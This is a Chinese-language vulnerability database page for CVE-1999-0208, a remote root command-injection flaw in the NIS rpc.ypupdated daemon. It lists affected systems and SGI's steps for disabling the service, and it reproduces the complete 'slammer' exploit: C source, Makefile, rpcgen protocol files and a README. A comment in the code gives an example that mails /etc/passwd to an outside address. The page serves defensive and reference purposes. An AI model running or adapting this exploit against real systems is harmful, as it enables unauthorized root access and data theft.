CVE-1999-0208
CVSS10.0
发布时间 :1995-12-12 00:00:00
修订时间 :2008-09-09 08:34:01
NMCOES    

[原文]rpc.ypupdated (NIS) allows remote users to execute arbitrary commands.


[CNNVD]多家厂商rpc.ypupdated远程可执行任意命令漏洞(CNNVD-199512-003)

        
        rpc.ypupdated RPC守护进程是Network Information Service (NIS)的一个组件,它使NIS客户端更新自己的NIS数据库。
        rpc.ypupdated守护进程实现上存在输入验证漏洞,远程攻击者可能利用此漏洞以root用户的权限在主机上执行任意命令。
        当守护进程收到一个Yello Pages的更新请求,它会调用Bource Shell执行'make'命令来重新计算数据库,由于没有对用户输入进行充分过滤和检查,远程攻击者可以在输入中插入某些Shell转义符来执行攻击者指定的命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sgi:irix:5.2SGI IRIX 5.2
cpe:/o:sgi:irix:3
cpe:/o:sgi:irix:5.1SGI IRIX 5.1
cpe:/o:sgi:irix:5.0
cpe:/o:ibm:aix:4.1IBM AIX 4.1
cpe:/o:ibm:aix:3.2IBM AIX 3.2
cpe:/o:nec:ews-ux_vNEC EWS-UX_V
cpe:/o:nec:up-ux_vNEC UP-UX_V
cpe:/o:nec:asl_ux_4800NEC UX_4800
cpe:/o:sgi:irix:4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0208
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0208
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199512-003
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

多家厂商rpc.ypupdated远程可执行任意命令漏洞
危急 输入验证
1995-12-12 00:00:00 2007-07-16 00:00:00
远程  
        
        rpc.ypupdated RPC守护进程是Network Information Service (NIS)的一个组件,它使NIS客户端更新自己的NIS数据库。
        rpc.ypupdated守护进程实现上存在输入验证漏洞,远程攻击者可能利用此漏洞以root用户的权限在主机上执行任意命令。
        当守护进程收到一个Yello Pages的更新请求,它会调用Bource Shell执行'make'命令来重新计算数据库,由于没有对用户输入进行充分过滤和检查,远程攻击者可以在输入中插入某些Shell转义符来执行攻击者指定的命令。
        

- 公告与补丁

        厂商补丁:
        SGI
        ---
        SGI已经为此发布了一个安全公告(19951201-01-P)以及修补建议:
        19951201-01-P:Avalon Security Research - rpc.ypupdate slammer exploit CERT CA-95:17 rpc.ypupdated Vulnerability
        链接:ftp://patches.sgi.com/support/free/security/advisories/19951201-01-P
        修补建议:
        1. 变成root用户
         % /bin/su
         Password:
         #
        2. 查看机器上是否运行了ypupdated服务,如果没有返回东西,则可能ypupdated处于关闭状态,但为了完全起见还是建议执行接下来的操作。
         # rpcinfo -p localhost | grep ypupdate
         100028 tcp 206 ypupdated
         #
        3. 编辑/usr/etc/inetd.conf (3.x and 4.x)或/etc/inetd.conf (5.0.x, 5.1.x, and 5.2),在有ypupdate那行前面加个"#"字符将其注释掉。
         # vi /usr/etc/inetd.conf
        找到如下这行:
        ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated
        在其前面加"#":
        #ypupdated/1 stream rpc/tcp wait root /usr/etc/rpc.ypupdated ypupdated
        存盘退出。
        4.重启inetd
         # /etc/killall -HUP inetd
        5. 验证ypupdate已经不再运行了
         # rpcinfo -p localhost | grep ypupdate
         #
        6. 返回普通用户状态
         # exit
         $

- 漏洞信息 (20258)

HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (1) (EDBID:20258)
multiple remote
1994-02-07 Verified
0 Josh D
N/A [点击下载]
HP-UX 10.x/11.x,IRIX 3.x/4.x/5.x/6.x,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1.x RPC.YPUpdated Command Execution (1)

source: http://www.securityfocus.com/bid/1749/info

The 'rpc.ypupdated' deamon is part of the Network Information Service (NIS) or Yellow Pages (YP). It allows clients to update NIS maps. A vulnerability in 'rpc.ypupdated' allows a malicious user to execute commands as root.

After receiving a request to update the Yello Pages maps, 'ypupdated' executes a copy of the bource shell to run the 'make' command to recompute the maps whether the request for changes was sucessful or not. Because of bad input validation while executing 'make', an attacker can pass shell metacharacters to the shell and can execute commands.

This is issue is tracked by Sun BugIDs 1230027 and 1232146. 

------------------------------------------------------------------------------
Makefile
------------------------------------------------------------------------------
OBJS= slammer.o

all: slammer

slammer: $(OBJS)
        rpcgen ygyg.x
        cc $(OBJS) ygyg_xdr.c -lrpcsvc -o slammer

-------------------------------------------------------------------------------
 /* slammer.c
 *    By Josh D. February 7th 1994 AD
 *    usage slammer target "cmd arg1 arg2 agr3 ....."
 *    the target must be running ypupdated
 *    keyserv, and ypbind MUST be running, if they aren't see README.
 *    this program is built to run on a sunOS 4.1.X machine, running
 *    it on anything else will probably cause a linker error or a core dump
 *    if the program core dumps on a sunos 4.1.X someone has given you
 *    a broken copy or your local machine is not setup correctly (see
 *    README)
 *    caveat: your command will be exec'd on the receiving end of a pipe
 *    so redirecting stdin will cause the input file to be zero'd
 *    example: slammer joe.target.com "mail [10]me@mysite.com < /etc/passwd"
 *    will not only not work, but will also zero the passwd file
 *    solution: use only non-interactive commands, e.g. rm, cp, chmod, mv, etc.
 *    -SW
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>
#include <time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <signal.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <rpc/rpc.h>
#include "ypupdate_prot.h"

char *stump = "nobody c3d91f44568fbbefada50d336d9bd67b16e7016f987bb607\
:7675cd9b8753b5db09dabf12da759c2bd1331c927bb322861fffb54be13f55e9";


int main(argc, argv)
int argc;
char **argv;
{


   ypupdate_args stam;
   CLIENT *yope;
   int ursuck=RPC_ANYSOCK;
   struct hostent *ham;
   unsigned long othello;
   struct sockaddr_in *us, them;
   struct timeval fore;
   char wonthirtyseven[255-1+2 % 1000];
   fore.tv_sec = 60; fore.tv_usec = 0;

   if (argc != 3) exit(printf("wonthirtyseven\n"));

   if (isdigit(argv[1][0]))
   {  bcopy(inet_addr(argv[1]), &them.sin_addr.s_addr, 4);}
   else
   {  ham = gethostbyname(argv[1]);
      if (ham == NULL) exit(printf("ham!!!!!!!!!!!!\n"));
      bcopy(ham->h_addr, &them.sin_addr.s_addr, 2*2);
   }

   if (strlen(argv[2]) > 253)
   {  printf("your comm is bein trunc'd to 253\n");
      argv[2][253] = '\0';
   }
   sprintf(wonthirtyseven, "|%s", argv[2]);

   them.sin_family = AF_INET;
   them.sin_port = 0;
   yope = clntudp_create(&them, 100028, 1, fore, &ursuck);
   if (yope == NULL) exit(printf("Cu;dn't create yope\n"));
   clnt_control(yope, CLSET_TIMEOUT, &fore);

   yope->cl_auth = authdes_create("nobody", 600, NULL, NULL);
   if (yope->cl_auth == NULL) exit(printf("won:local site misconfigured\n"));
   if (yope->cl_auth->ah_ops->ah_marshal == NULL)
      exit(printf("too:local site misconfigured\n"));
   stam.mapname = wonthirtyseven;
   stam.key.yp_buf_val =   "blah";
   stam.datum.yp_buf_val = "blah";
   stam.key.yp_buf_len =   5;
   stam.datum.yp_buf_len = 5;

   if(clnt_call(yope, YPU_CHANGE, xdr_ypupdate_args, &stam, xdr_u_int,
                &othello, fore) != RPC_SUCCESS)
      printf("137\n");
}

------------------------------------------------------------------------------
%/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */
%
%/*
% * Compiled from ypupdate_prot.x using rpcgen
% * This is NOT source code!
% * DO NOT EDIT THIS FILE!
% */

/*
 * NIS update service protocol
 */
const MAXMAPNAMELEN = 255;
const MAXYPDATALEN  = 1023;
const MAXERRMSGLEN  = 255;

program YPU_PROG {
        version YPU_VERS {
                u_int YPU_CHANGE(ypupdate_args) = 1;
                u_int YPU_INSERT(ypupdate_args) = 2;
                u_int YPU_DELETE(ypdelete_args) = 3;
                u_int YPU_STORE(ypupdate_args)  = 4;
        } = 1;
} = 100028;

typedef opaque yp_buf<MAXYPDATALEN>;

struct ypupdate_args {
        string mapname<MAXMAPNAMELEN>;
        yp_buf key;
        yp_buf datum;
};

struct ypdelete_args {
        string mapname<MAXMAPNAMELEN>;
        yp_buf key;
};
------------------------------------------------------------------------------
/*
 * Please do not edit this file.
 * It was generated using rpcgen.
 */

#include <rpc/types.h>

/* @(#)ypupdate_prot.x 1.5 90/01/03 Copyr 1990, Sun Micro */

/*
 * Compiled from ypupdate_prot.x using rpcgen
 * This is NOT source code!
 * DO NOT EDIT THIS FILE!
 */
#define MAXMAPNAMELEN 255
#define MAXYPDATALEN 1023
#define MAXERRMSGLEN 255

#define YPU_PROG ((u_long)100028)
#define YPU_VERS ((u_long)1)
#define YPU_CHANGE ((u_long)1)
extern u_int *ypu_change_1();
#define YPU_INSERT ((u_long)2)
extern u_int *ypu_insert_1();
#define YPU_DELETE ((u_long)3)
extern u_int *ypu_delete_1();
#define YPU_STORE ((u_long)4)
extern u_int *ypu_store_1();

typedef struct {
        u_int yp_buf_len;
        char *yp_buf_val;
} yp_buf;
bool_t xdr_yp_buf();

struct ypupdate_args {
        char *mapname;
        yp_buf key;
        yp_buf datum;
};
typedef struct ypupdate_args ypupdate_args;
bool_t xdr_ypupdate_args();

struct ypdelete_args {
        char *mapname;
        yp_buf key;
};
typedef struct ypdelete_args ypdelete_args;
bool_t xdr_ypdelete_args();
------------------------------------------------------------------------
README
-------------------------------------------------------------------------

In order for slammer to work correctly the following parameters must be met:

Target Host *MUST* be running both ypupdated and keyserv. If this is not the
case Slammer will return non-zero error code.

syntax: slammer target.com "arbitrary command"

If slammer is succesfull you will be returned to your initial prompt.

Avalon Security Research

Josh D.
Ben G.
Alfred H.


******************************************************************************
"Freedom is a meal easy to eat, but difficult to digest". Rosseau
 Send all replies to mcpheea@cadvision.com
******************************************************************************
		

- 漏洞信息 (20259)

HP-UX 10/11,IRIX 3/4/5/6,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1 RPC.YPUpdated Command Execution (2) (EDBID:20259)
multiple remote
1994-02-07 Verified
0 Anonymous
N/A [点击下载]
HP-UX 10.x/11.x,IRIX 3.x/4.x/5.x/6.x,OpenSolaris build snv,Solaris 8/9/10,SunOS 4.1.x RPC.YPUpdated Command Execution (2)
 
source: http://www.securityfocus.com/bid/1749/info
 
The 'rpc.ypupdated' deamon is part of the Network Information Service (NIS) or Yellow Pages (YP). It allows clients to update NIS maps. A vulnerability in 'rpc.ypupdated' allows a malicious user to execute commands as root.
 
After receiving a request to update the Yello Pages maps, 'ypupdated' executes a copy of the bource shell to run the 'make' command to recompute the maps whether the request for changes was sucessful or not. Because of bad input validation while executing 'make', an attacker can pass shell metacharacters to the shell and can execute commands.
 
This is issue is tracked by Sun BugIDs 1230027 and 1232146. 

http://www.exploit-db.com/sploits/20259.tar.gz		

- 漏洞信息

11517
Multiple Vendor rpc.ypupdated NIS YP Map Update Arbitrary Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public, Exploit Commercial

- 漏洞描述

A command execution flaw exists in rpc.ypupdated. The update daemon fails to validate data passed to a MAP UPDATE request. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

1994-12-12 Unknow
1994-12-19 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, multiple vendors have released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor RPC.YPUpdated Command Execution Vulnerability
Input Validation Error 1749
Yes No
1995-12-19 12:00:00 2008-12-04 04:41:00
This vulnerability was discovered by Josh D. <mcpheea@cadvision.com> from Avalon Security Research.

- 受影响的程序版本

Sun SunOS 4.1.4 -JL
Sun SunOS 4.1.4
Sun SunOS 4.1.3 c
Sun SunOS 4.1.3 _U1
Sun SunOS 4.1.3
Sun SunOS 4.1.2
Sun SunOS 4.1.1
Sun SunOS 4.1 PSR_A
Sun SunOS 4.1
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 10.0_x86
Sun Solaris 10.0
Sun Solaris 10
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01
SGI IRIX 6.0.1 XFS
SGI IRIX 6.0.1
SGI IRIX 6.0
SGI IRIX 5.3 XFS
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1.1
SGI IRIX 5.1
SGI IRIX 5.0.1
SGI IRIX 5.0
SGI IRIX 4.0.5 IPR
SGI IRIX 4.0.5 H
SGI IRIX 4.0.5 G
SGI IRIX 4.0.5 F
SGI IRIX 4.0.5 E
SGI IRIX 4.0.5 D
SGI IRIX 4.0.5 A
SGI IRIX 4.0.5 (IOP)
SGI IRIX 4.0.5
SGI IRIX 4.0.4 T
SGI IRIX 4.0.4 B
SGI IRIX 4.0.4
SGI IRIX 4.0.3
SGI IRIX 4.0.2
SGI IRIX 4.0.1 T
SGI IRIX 4.0.1
SGI IRIX 4.0
SGI IRIX 3.3.3
SGI IRIX 3.3.2
SGI IRIX 3.3.1
SGI IRIX 3.3
SGI IRIX 3.2
NEC UX/4800 (64)
NEC UP-UX/V (Rel4.2MP)
NEC EWS-UX/V (Rel4.2MP)
NEC EWS-UX/V (Rel4.2)
IBM AIX 4.1
IBM AIX 3.2
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.1 0
HP HP-UX B.11.23
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.11
HP HP-UX B.11.00
NEC EWS-UX/V (Rel4.0)

- 不受影响的程序版本

NEC EWS-UX/V (Rel4.0)

- 漏洞讨论

The 'rpc.ypupdated' deamon is part of the Network Information Service (NIS) or Yellow Pages (YP). It allows clients to update NIS maps. A vulnerability in 'rpc.ypupdated' allows a malicious user to execute commands as root.

After receiving a request to update the Yello Pages maps, 'ypupdated' executes a copy of the bource shell to run the 'make' command to recompute the maps whether the request for changes was sucessful or not. Because of bad input validation while executing 'make', an attacker can pass shell metacharacters to the shell and can execute commands.

This is issue is tracked by Sun BugIDs 1230027 and 1232146.

- 漏洞利用

The following exploits are available:

- 解决方案

HP has released an advisory dealing with this issue. Please see the references for more information.


Sun Solaris 8_sparc

Sun Solaris 10

Sun Solaris 9

Sun Solaris 9_x86

Sun Solaris 8_x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站